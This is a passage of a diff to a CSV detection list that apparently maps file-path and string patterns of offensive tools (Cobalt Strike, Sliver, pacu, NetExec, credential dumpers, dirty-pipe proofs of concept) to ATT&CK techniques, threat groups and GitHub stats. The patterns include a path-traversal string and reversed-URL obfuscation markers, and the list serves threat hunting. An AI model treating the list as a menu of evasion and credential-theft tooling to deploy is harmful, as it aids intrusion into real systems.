TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/../../../../../boot.ini*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*/.aggressor.prop*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/.cme/cme.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/.exegol/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/.local/share/pacu/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/.manspider/logs*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*/.manspider/loot*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*/.local/share/pacu/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/.manspider/logs*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/.manspider/loot*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*/.msf4/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*/.ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*/.sliver/logs*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/.ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/.nxc/obfuscated_scripts/*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/.sliver/logs*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/.ssh/RAI.pub*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*//:ptth*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed http://","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*//:sptth*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed https://","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -2560,53 +2561,55 @@ "*/0xdarkvortex-*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*/0xIronGoat/dirty-pipe*","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","1","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" "*/0xthirteen/*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" -"*/0xthirteen/StayKit*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/0xthirteen/StayKit*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/1mxml/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1190 - T1550 - T1078","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://github.com/1mxml/CVE-2022-23131","1","1","N/A","N/A","1","3","1","2022-02-19T03:14:47Z","2022-02-18T14:48:53Z" "*/365-Stealer.git*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*/3DESEncryptor.go*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" -"*/3snake.git*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/3snake.git*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/4luc4rdr5290/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/AbandonedCOMKeys/*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/AbandonedCOMKeys/*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/acarsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/AceLdr.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/AceLdr.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*/acheron.git*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/acheron.go*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/ACLight.git*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*/ACLight/*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Information Gathering","https://github.com/cyberark/ACLight","1","1","N/A","N/A","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*/acltoolkit*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" -"*/acm_enum_cas_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/acm_enum_certs_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/acm_enum_certs_chain_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/acm_enum_certs_expired_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/acm_enum_certs_info_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/ActiveScanPlusPlus*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","N/A","6","568","192","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*/acm_enum_cas_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_chain_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_expired_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_info_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ActiveScanPlusPlus*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","N/A","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" "*/AD_Enumeration_Hunt*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*/ADACLScanner.git*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*/adalanche/modules/*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" -"*/adconnectdump.git*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*/adcs_enum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 